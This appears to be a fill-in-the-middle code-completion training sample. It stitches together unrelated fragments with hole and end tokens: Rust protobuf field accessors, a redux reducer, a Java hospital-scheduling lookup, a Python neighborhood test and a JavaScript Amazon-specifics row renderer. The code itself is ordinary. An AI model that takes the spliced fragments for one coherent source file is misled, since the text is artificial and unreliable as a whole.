        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::U32(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_u64_generic(&self, m: &Message) -> u64 {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::U64(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_i32_generic(&self, m: &Message) -> i32 {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::I32(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_i64_generic(&self, m: &Message) -> i64 {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::I64(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_f32_generic(&self, m: &Message) -> f32 {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::F32(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_f64_generic(&self, m: &Message) -> f64 {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::F64(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_bool_generic(&self, m: &Message) -> bool {
        match self.fns {
            FieldAccessorFunctions::Singular { get: SingularGet::Bool(get), .. } =>
                get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    // ---- repeated getters ----
    fn get_rep_message_item_generic<'a>(&self, m: &'a Message, index: usize) -> &'a Message {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::Message(ref get)) =>
                get.get_message_item(message_down_cast(m), index),
            _ => panic!(),
        }
    }
    fn get_rep_enum_item_generic(&self, m: &Message, index: usize) -> &'static EnumValueDescriptor {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::Enum(ref get)) =>
                get.get_enum_item(message_down_cast(m), index),
            _ => panic!(),
        }
    }
    fn get_rep_str_generic<'a>(&self, m: &'a Message) -> &'a [String] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::String(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_bytes_generic<'a>(&self, m: &'a Message) -> &'a [Vec<u8>] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::Bytes(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_u32_generic<'a>(&self, m: &'a Message) -> &'a [u32] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::U32(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_u64_generic<'a>(&self, m: &'a Message) -> &'a [u64] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::U64(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_i32_generic<'a>(&self, m: &'a Message) -> &'a [i32] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::I32(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_i64_generic<'a>(&self, m: &'a Message) -> &'a [i64] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::I64(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_f32_generic<'a>(&self, m: &'a Message) -> &'a [f32] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::F32(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_f64_generic<'a>(&self, m: &'a Message) -> &'a [f64] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::F64(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
    fn get_rep_bool_generic<'a>(&self, m: &'a Message) -> &'a [bool] {
        match self.fns {
            FieldAccessorFunctions::Repeated(RepeatedGet::Bool(get)) => get(message_down_cast(m)),
            _ => panic!(),
        }
    }
}
// singular

/// Builds an accessor for a singular `u32` field.
pub fn make_singular_u32_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> u32,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::U32(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `i32` field.
pub fn make_singular_i32_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> i32,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::I32(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `u64` field.
pub fn make_singular_u64_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> u64,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::U64(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `i64` field.
pub fn make_singular_i64_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> i64,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::I64(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `f32` field.
pub fn make_singular_f32_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> f32,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::F32(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `f64` field.
pub fn make_singular_f64_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> f64,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::F64(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `bool` field.
pub fn make_singular_bool_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> bool,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::Bool(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}
/// Builds an accessor for a singular `string` field.
pub fn make_singular_string_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: for<'a> fn(&'a M) -> &'a str,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::String(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular `bytes` field.
pub fn make_singular_bytes_accessor<M : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: for<'a> fn(&'a M) -> &'a [u8],
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::Bytes(get),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular enum field; the concrete enum type `E`
/// is erased behind a boxed `GetSingularEnum` adapter.
pub fn make_singular_enum_accessor<M : Message + 'static, E : ProtobufEnum + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: fn(&M) -> E,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::Enum(
            Box::new(GetSingularEnumImpl { get: get }),
        ),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a singular message field; the concrete message type
/// `F` is erased behind a boxed `GetSingularMessage` adapter.
pub fn make_singular_message_accessor<M : Message + 'static, F : Message + 'static>(
    name: &'static str,
    has: fn(&M) -> bool,
    get: for<'a> fn(&'a M) -> &'a F,
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Singular {
        has: has,
        get: SingularGet::Message(
            Box::new(GetSingularMessageImpl { get: get }),
        ),
    };
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}
// repeated

/// Builds an accessor for a repeated `u32` field.
pub fn make_repeated_u32_accessor<M : Message + 'static>(
    name: &'static str,
    get: for<'a> fn(&'a M) -> &'a [u32],
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Repeated(RepeatedGet::U32(get));
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a repeated `i32` field.
pub fn make_repeated_i32_accessor<M : Message + 'static>(
    name: &'static str,
    get: for<'a> fn(&'a M) -> &'a [i32],
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Repeated(RepeatedGet::I32(get));
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a repeated `u64` field.
pub fn make_repeated_u64_accessor<M : Message + 'static>(
    name: &'static str,
    get: for<'a> fn(&'a M) -> &'a [u64],
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Repeated(RepeatedGet::U64(get));
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a repeated `i64` field.
pub fn make_repeated_i64_accessor<M : Message + 'static>(
    name: &'static str,
    get: for<'a> fn(&'a M) -> &'a [i64],
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Repeated(RepeatedGet::I64(get));
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}

/// Builds an accessor for a repeated `f32` field.
pub fn make_repeated_f32_accessor<M : Message + 'static>(
    name: &'static str,
    get: for<'a> fn(&'a M) -> &'a [f32],
) -> Box<FieldAccessor + 'static>
{
    let fns = FieldAccessorFunctions::Repeated(RepeatedGet::F32(get));
    let accessor = FieldAccessorImpl { name: name, fns: fns };
    Box::new(accessor)
}
pub fn make_repeated_f64_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [f64],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,<|fim▁hole|>
pub fn make_repeated_bool_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [bool],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Bool(get)),
})
}
pub fn make_repeated_string_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [String],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::String(get)),
})
}
pub fn make_repeated_bytes_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [Vec<u8>],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Bytes(get)),
})
}
pub fn make_repeated_enum_accessor<M : Message + 'static, E : ProtobufEnum + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [E],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Enum(
Box::new(GetRepeatedEnumImpl { get: get }),
)),
})
}
pub fn make_repeated_message_accessor<M : Message + 'static, F : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [F],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Message(
Box::new(GetRepeatedMessageImpl { get: get }),
)),
})
}<|fim▁end|> | fns: FieldAccessorFunctions::Repeated(RepeatedGet::F64(get)),
})
} |
<|file_name|>game.js<|end_file_name|><|fim▁begin|><|fim▁hole|>import { combineReducers } from 'redux-immutable';
import gluttonousSnake from 'isomerism/reducers/components/game/gluttonousSnake';
export default combineReducers({
gluttonousSnake,
});<|fim▁end|> | |
<|file_name|>ReasonTextDialogImpl.java<|end_file_name|><|fim▁begin|>//#############################################################################
//# #
//# Copyright (C) <2015> <IMS MAXIMS> #
//# #
//# This program is free software: you can redistribute it and/or modify #
//# it under the terms of the GNU Affero General Public License as #
//# published by the Free Software Foundation, either version 3 of the #
//# License, or (at your option) any later version. #
//# #
//# This program is distributed in the hope that it will be useful, #
//# but WITHOUT ANY WARRANTY; without even the implied warranty of #
//# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
//# GNU Affero General Public License for more details. #
//# #
//# You should have received a copy of the GNU Affero General Public License #
//# along with this program. If not, see <http://www.gnu.org/licenses/>. #
//# #
//# IMS MAXIMS provides absolutely NO GUARANTEE OF THE CLINICAL SAFTEY of #
//# this program. Users of this software do so entirely at their own risk. #
//# IMS MAXIMS only ensures the Clinical Safety of unaltered run-time #
//# software that it builds, deploys and maintains. #
//# #
//#############################################################################
//#EOH
// This code was generated by Silviu Checherita using IMS Development Environment (version 1.80 build 5567.19951)
// Copyright (C) 1995-2015 IMS MAXIMS. All rights reserved.
package ims.scheduling.domain.impl;
import java.util.ArrayList;
import java.util.List;
import ims.domain.DomainFactory;
import ims.domain.lookups.LookupInstance;
import ims.scheduling.domain.base.impl.BaseReasonTextDialogImpl;
import ims.scheduling.vo.lookups.CancelAppointmentReason;
import ims.scheduling.vo.lookups.CancelAppointmentReasonCollection;
import ims.scheduling.vo.lookups.Status_Reason;
public class ReasonTextDialogImpl extends BaseReasonTextDialogImpl
{
private static final long serialVersionUID = 1L;
//WDEV-21736
public CancelAppointmentReasonCollection listReasons()
{
DomainFactory factory = getDomainFactory();
<|fim▁hole|> String hql = "SELECT r FROM CancellationTypeReason AS t LEFT JOIN t.cancellationReason as r WHERE t.cancellationType.id = :cancellationType AND r.active = 1";
markers.add("cancellationType");
values.add(Status_Reason.HOSPITALCANCELLED.getID());
List results = factory.find(hql.toString(), markers,values);
if (results == null)
return null;
CancelAppointmentReasonCollection col = new CancelAppointmentReasonCollection();
for (int i=0; i<results.size(); i++)
{
CancelAppointmentReason reason = new CancelAppointmentReason(((LookupInstance) results.get(i)).getId(), ((LookupInstance) results.get(i)).getText(), ((LookupInstance) results.get(i)).isActive());
col.add(reason);
}
return col;
}
//WDEV-21736 ends here
}<|fim▁end|> | ArrayList markers = new ArrayList();
ArrayList values = new ArrayList();
|
<|file_name|>test_get_neighborhoods.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""
PURPOSE: The routines in this file test the get_neighborhoods module.
Created on 2015-04-02T21:24:17
"""
from __future__ import division, print_function
#import numpy as np
#from types import *
#from nose.tools import raises
#import pandas as pd
import nhrc2.backend.read_seeclickfix_api_to_csv as rscf
from nhrc2.backend import get_neighborhoods as get_ngbrhd
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "[email protected]"
__status__ = " Development NOT(Prototype or Production)"
<|fim▁hole|> """
Ensure the number in the hood list length = the number of issues
"""
scf_cats = rscf.read_categories(readfile=True)
issues = rscf.read_issues(scf_cats, readfile=True)
hoods = get_ngbrhd.get_neighborhoods()
assert len(issues) == len(hoods)
#@raises(ValueError)
#def test_make_function_raise_value_error():<|fim▁end|> |
#make sure the number of neighborhoods is equal to the number of issues.
def test_get_neighborhoods(): |
<|file_name|>RowRenderer.js<|end_file_name|><|fim▁begin|><|fim▁hole|>
attributeHandler: null,
// ---------------------------------------
    // Entry point: render this specific's row.
    // Skips work when the row is already rendered, except that a force-set
    // value (an undeletable specific) is re-applied — and its remove button
    // hidden — even for an already-rendered row.
    process: function()
    {
        if (this.specificHandler.isSpecificRendered(this.indexedXPath) && !this.isValueForceSet()) {
            return '';
        }
        // load() prepares handlers/data; abort when it reports failure.
        if (!this.load()) {
            return '';
        }
        // Rendering the parent (container) specific can render this row too,
        // so re-check the rendered state afterwards.
        this.renderParentSpecific();
        if (this.specificHandler.isSpecificRendered(this.indexedXPath) && !this.isValueForceSet()) {
            return '';
        }
        if (this.specificHandler.isSpecificRendered(this.indexedXPath)) {
            // Row exists but a value must be forced: select and lock it,
            // hide its remove button, and notify the parent row element.
            if (this.isValueForceSet()) {
                this.forceSelectAndDisable(this.getForceSetValue());
                this.hideButton($(this.indexedXPath + '_remove_button'));
                var myEvent = new CustomEvent('undeleteble-specific-appear');
                $(this.getParentIndexedXpath()).dispatchEvent(myEvent);
            }
            return '';
        }
        // Fresh render: build the row, then apply any forced value.
        this.renderSelf();
        if (this.isValueForceSet()) {
            this.forceSelectAndDisable(this.getForceSetValue());
        }
        this.observeToolTips(this.indexedXPath);
        this.checkSelection();
        this.renderSpecificAttributes();
    },
// ---------------------------------------
    // Prototype.js-style override: captures the global AttributeHandlerObj,
    // then delegates to the parent class implementation via $super.
    load: function($super)
    {
        this.attributeHandler = AttributeHandlerObj;
        return $super();
    },
//########################################
renderParentSpecific: function()
{
if (this.specific.parent_specific_id == null) {
return '';
}
if (!this.dictionaryHelper.isSpecificTypeContainer(this.parentSpecific)) {
return '';
}
var parentBlockRenderer = new AmazonTemplateDescriptionCategorySpecificBlockRenderer();
parentBlockRenderer.setSpecificsHandler(this.specificHandler);
parentBlockRenderer.setIndexedXpath(this.getParentIndexedXpath());
parentBlockRenderer.process();
},
    // Builds the row itself: label cell, mode <select>, value inputs and
    // action buttons, then wires row-level events.
    renderSelf: function()
    {
        this.renderLabel();
        this.renderChooseMode();
        this.renderValueInputs();
        // Mark as rendered before drawing buttons:
        // affects the appearance of the actions buttons.
        this.specificHandler.markSpecificAsRendered(this.indexedXPath);
        this.renderButtons();
        // ---------------------------------------
        $(this.indexedXPath).observe('my-duplicate-is-rendered', this.onMyDuplicateRendered.bind(this));
        // ---------------------------------------
        // Let ancestors react (like grid visibility or the view of the
        // 'Add Specific' container).
        this.throwEventsToParents();
    },
    // Renders one attribute row per entry of this.specific.params.attributes
    // (when present), reusing this row's indexed XPath as the parent path.
    renderSpecificAttributes: function()
    {
        var self = this;
        if (!this.specific.params.hasOwnProperty('attributes')) {
            return '';
        }
        this.specific.params.attributes.each(function(attribute, index) {
            var renderer = new AmazonTemplateDescriptionCategorySpecificGridRowAttributeRenderer();
            renderer.setSpecificsHandler(self.specificHandler);
            renderer.setIndexedXpath(self.indexedXPath);
            renderer.attribute = attribute;
            renderer.attributeIndex = index;
            renderer.process();
        });
    },
//########################################
    // Builds the label <td>: the specific's title, a required '*' marker for
    // required or force-set specifics (or a grey '(Desired)' hint), plus an
    // optional definition tooltip and overridden/parentage notices.
    renderLabel: function()
    {
        var td = new Element('td');
        var title = this.specific.title;
        if (this.dictionaryHelper.isSpecificRequired(this.specific) || this.isValueForceSet()) {
            title += ' <span class="required">*</span>';
        } else if (this.dictionaryHelper.isSpecificDesired(this.specific)) {
            title += ' <span style="color: grey; font-style: italic;">(' + M2ePro.translator.translate('Desired') + ')</span>';
        }
        td.appendChild((new Element('span').insert(title)));
        // Tooltip with the Amazon data-definition note, when one exists.
        var note = this.getDefinitionNote(this.specific.data_definition);
        if (note) {
            var toolTip = this.getToolTipBlock(this.indexedXPath + '_definition_note', note);
            toolTip.show();
            td.appendChild(toolTip);
        }
        var notice = this.getSpecificOverriddenNotice();
        if (notice) td.appendChild(notice);
        notice = this.getSpecificParentageNotice();
        if (notice) td.appendChild(notice);
        this.getRowContainer().appendChild(td);
    },
// ---------------------------------------
    // Builds the mode <select> (Recommended Values / Custom Value /
    // Custom Attribute) with a hidden placeholder option; the 'Recommended
    // Values' option appears only when recommended values exist.
    renderChooseMode: function()
    {
        var select = new Element('select', {
            'id'           : this.indexedXPath +'_mode',
            'indexedxpath' : this.indexedXPath,
            'class'        : 'M2ePro-required-when-visible',
            'style'        : 'width: 93.2%;'
        });
        // Hidden empty option serves as the unset placeholder.
        select.appendChild(new Element('option', {'style': 'display: none'}));
        if (this.specific.recommended_values.length > 0) {
            // appendChild returns the appended option; insert() sets its label.
            select.appendChild(new Element('option', {'value': this.MODE_RECOMMENDED_VALUE}))
                  .insert(M2ePro.translator.translate('Recommended Values'));
        }
        select.appendChild(new Element('option', {'value': this.MODE_CUSTOM_VALUE}))
              .insert(M2ePro.translator.translate('Custom Value'));
        select.appendChild(new Element('option', {'value': this.MODE_CUSTOM_ATTRIBUTE}))
              .insert(M2ePro.translator.translate('Custom Attribute'));
        select.observe('change', this.onChangeChooseMode.bind(this));
        this.getRowContainer().appendChild(new Element('td')).appendChild(select);
    },
    // Mode <select> change handler: hides every mode-specific input, note and
    // validation-advice element, then shows only those of the chosen mode.
    // NOTE(review): customValue.id / customAttribute.id are read
    // unconditionally — this assumes both inputs always exist in the DOM.
    onChangeChooseMode: function(event)
    {
        var customValue = $(this.indexedXPath + '_' + this.MODE_CUSTOM_VALUE),
            customValueNote = $(this.indexedXPath + '_custom_value_note'),
            customValueNoteError = $('advice-M2ePro-specifics-validation-' + customValue.id);
        var customAttribute = $(this.indexedXPath + '_' + this.MODE_CUSTOM_ATTRIBUTE),
            customAttributeNote = $(this.indexedXPath + '_custom_attribute_note'),
            customAttributeError = $('advice-M2ePro-required-when-visible-' + customAttribute.id);
        var recommendedValue = $(this.indexedXPath + '_' + this.MODE_RECOMMENDED_VALUE);
        // Hide everything first.
        customValue && customValue.hide();
        customValueNote && customValueNote.hide();
        customValueNoteError && customValueNoteError.hide();
        customAttribute && customAttribute.hide();
        customAttributeNote && customAttributeNote.hide();
        customAttributeError && customAttributeError.hide();
        recommendedValue && recommendedValue.hide();
        // Then reveal the group matching the selected mode.
        if (event.target.value == this.MODE_CUSTOM_VALUE) {
            customValue && customValue.show();
            customValueNote && customValueNote.show();
            customValueNoteError && customValueNoteError.show();
        }
        if (event.target.value == this.MODE_CUSTOM_ATTRIBUTE) {
            customAttribute && customAttribute.show();
            customAttributeNote && customAttributeNote.show();
            customAttributeError && customAttributeError.show();
        }
        if (event.target.value == this.MODE_RECOMMENDED_VALUE) {
            recommendedValue && recommendedValue.show();
        }
    },
// ---------------------------------------
renderValueInputs: function()
{
var td = this.getRowContainer().appendChild(new Element('td'));
// ---------------------------------------
if (this.dictionaryHelper.isSpecificTypeText(this.specific)) {
var note = this.getCustomValueTypeNote();
if (note) td.appendChild(this.getToolTipBlock(this.indexedXPath + '_custom_value_note', note));
td.appendChild(this.getTextTypeInput());
}
if (this.dictionaryHelper.isSpecificTypeSelect(this.specific)) {
td.appendChild(this.getSelectTypeInput());
}
// ---------------------------------------
// ---------------------------------------
note = this.getCustomAttributeTypeNote();
if (note) td.appendChild(this.getToolTipBlock(this.indexedXPath + '_custom_attribute_note', note));
td.appendChild(this.getCustomAttributeSelect());
// ---------------------------------------
td.appendChild(this.getRecommendedValuesSelect());
},
// ---------------------------------------
getTextTypeInput: function()
{
if (this.dictionaryHelper.isSpecificTypeTextArea(this.specific)) {
var input = new Element('textarea', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE,
'indexedxpath' : this.indexedXPath,
'specific_id' : this.specific.specific_id,
'specific_type' : this.specific.params.type,
'mode' : this.MODE_CUSTOM_VALUE,
'class' : 'M2ePro-required-when-visible M2ePro-specifics-validation',
'style' : 'width: 91.4%; display: none;'
});
} else {
var input = new Element('input', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE,
'indexedxpath' : this.indexedXPath,
'specific_id' : this.specific.specific_id,
'mode' : this.MODE_CUSTOM_VALUE,
'specific_type' : this.specific.params.type,
'type' : 'text',
'class' : 'input-text M2ePro-required-when-visible M2ePro-specifics-validation',
'style' : 'display: none; width: 91.4%;'
});
this.specific.params.type == 'date_time' && Calendar.setup({
'inputField': input,
'ifFormat': "%Y-%m-%d %H:%M:%S",
'showsTime': true,
'button': input,
'align': 'Bl',
'singleClick': true
});
this.specific.params.type == 'date' && Calendar.setup({
'inputField': input,
'ifFormat': "%Y-%m-%d",
'showsTime': true,
'button': input,
'align': 'Bl',
'singleClick': true
});
}
input.observe('change', this.onChangeValue.bind(this));
return input;
},
getSelectTypeInput: function()
{
var self = this;
var select = new Element('select', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE,
'indexedxpath': this.indexedXPath,
'specific_id' : this.specific.specific_id,
'mode' : this.MODE_CUSTOM_VALUE,
'class' : 'M2ePro-required-when-visible',
'style' : 'display: none; width: 93.2%;'
});
select.appendChild(new Element('option', {'style': 'display: none;'}));
var specificOptions = this.specific.values;
specificOptions.each(function(option) {
var label = option == 'true' ? 'Yes' : (option == 'false' ? 'No' : option),
tempOption = new Element('option', {'value': option});
select.appendChild(tempOption).insert(label);
});
select.observe('change', this.onChangeValue.bind(this));
return select;
},
getCustomAttributeSelect: function()
{
var select = new Element('select', {
'id' : this.indexedXPath +'_'+ this.MODE_CUSTOM_ATTRIBUTE,
'indexedxpath' : this.indexedXPath,
'specific_id' : this.specific.specific_id,
'specific_type' : this.specific.params.type,
'mode' : this.MODE_CUSTOM_ATTRIBUTE,
'class' : 'attributes M2ePro-required-when-visible',
'style' : 'display: none; width: 93.2%;',
'apply_to_all_attribute_sets' : '0'
});
select.appendChild(new Element('option', {'style': 'display: none', 'value': ''}));
this.attributeHandler.availableAttributes.each(function(el) {
select.appendChild(new Element('option', {'value': el.code})).insert(el.label);
});
select.value = '';
select.observe('change', this.onChangeValue.bind(this));
var handlerObj = new AttributeCreator(select.id);
handlerObj.setSelectObj(select);
handlerObj.injectAddOption();
return select;
},
getRecommendedValuesSelect: function()
{
var select = new Element('select', {
'id' : this.indexedXPath +'_'+ this.MODE_RECOMMENDED_VALUE,
'indexedxpath': this.indexedXPath,
'specific_id' : this.specific.specific_id,
'mode' : this.MODE_RECOMMENDED_VALUE,
'class' : 'M2ePro-required-when-visible',
'style' : 'display: none; width: 93.2%;'
});
select.appendChild(new Element('option', {'style': 'display: none', 'value': ''}));
this.specific.recommended_values.each(function(value) {
select.appendChild(new Element('option', {'value': value})).insert(value);
});
select.value = '';
select.observe('change', this.onChangeValue.bind(this));
return select;
},
onChangeValue: function(event)
{
var selectedObj = {};
selectedObj['mode'] = event.target.getAttribute('mode');
selectedObj['type'] = event.target.getAttribute('specific_type');
selectedObj['is_required'] = (this.dictionaryHelper.isSpecificRequired(this.specific) || this.isValueForceSet()) ? 1 : 0;
selectedObj[selectedObj.mode] = event.target.value;
this.specificHandler.markSpecificAsSelected(this.indexedXPath, selectedObj);
},
// ---------------------------------------
renderButtons: function()
{
var td = this.getRowContainer().appendChild(new Element('td'));
var cloneButton = this.getCloneButton();
if(cloneButton !== null) td.appendChild(cloneButton);
var removeButton = this.getRemoveButton();
if(removeButton !== null) td.appendChild(removeButton);
},
// ---------------------------------------
throwEventsToParents: function()
{
var myEvent,
parentXpath;
// ---------------------------------------
myEvent = new CustomEvent('child-specific-rendered');
parentXpath = this.getParentIndexedXpath();
$(parentXpath + '_grid').dispatchEvent(myEvent);
$(parentXpath + '_add_row').dispatchEvent(myEvent);
// ---------------------------------------
// my duplicate is already rendered
this.touchMyNeighbors();
// ---------------------------------------
// ---------------------------------------
if (this.isValueForceSet()) {
this.hideButton($(this.indexedXPath + '_remove_button'));
myEvent = new CustomEvent('undeleteble-specific-appear');
$(this.getParentIndexedXpath()).dispatchEvent(myEvent);
}
// ---------------------------------------
},
//########################################
checkSelection: function()
{
if (this.specific.values.length == 1) {
this.forceSelectAndDisable(this.specific.values[0]);
return '';
}
if (!this.specificHandler.isMarkedAsSelected(this.indexedXPath) &&
!this.specificHandler.isInFormData(this.indexedXPath)) {
return '';
}
var selectionInfo = this.specificHandler.getSelectionInfo(this.indexedXPath);
var id = this.indexedXPath + '_mode';
$(id).value = selectionInfo.mode;
this.simulateAction($(id), 'change');
if (selectionInfo.mode == this.MODE_CUSTOM_VALUE) {
id = this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE;
$(id).value = selectionInfo['custom_value'];
this.simulateAction($(id), 'change');
}
if (selectionInfo.mode == this.MODE_CUSTOM_ATTRIBUTE) {
id = this.indexedXPath +'_'+ this.MODE_CUSTOM_ATTRIBUTE;
$(id).value = selectionInfo['custom_attribute'];
this.simulateAction($(id), 'change');
}
if (selectionInfo.mode == this.MODE_RECOMMENDED_VALUE) {
id = this.indexedXPath +'_'+ this.MODE_RECOMMENDED_VALUE;
$(id).value = selectionInfo['recommended_value'];
this.simulateAction($(id), 'change');
}
},
forceSelectAndDisable: function(value)
{
if (!value) {
return;
}
var modeSelect = $(this.indexedXPath + '_mode');
modeSelect.value = this.MODE_CUSTOM_VALUE;
this.simulateAction(modeSelect, 'change');
modeSelect.setAttribute('disabled','disabled');
var valueObj = $(this.indexedXPath +'_'+ this.MODE_CUSTOM_VALUE);
valueObj.value = value;
this.simulateAction(valueObj, 'change');
valueObj.setAttribute('disabled', 'disabled');
},
//########################################
getToolTipBlock: function(id, messageHtml)
{
var container = new Element('div', {
'id' : id,
'style': 'float: right; display: none;'
});
container.appendChild(new Element('img', {
'src' : M2ePro.url.get('m2epro_skin_url') + '/images/tool-tip-icon.png',
'class' : 'tool-tip-image'
}));
var htmlCont = container.appendChild(new Element('span', {
'class' : 'tool-tip-message tip-left',
'style' : 'display: none; max-width: 500px;'
}));
htmlCont.appendChild(new Element('img', {
'src': M2ePro.url.get('m2epro_skin_url') + '/images/help.png'
}));
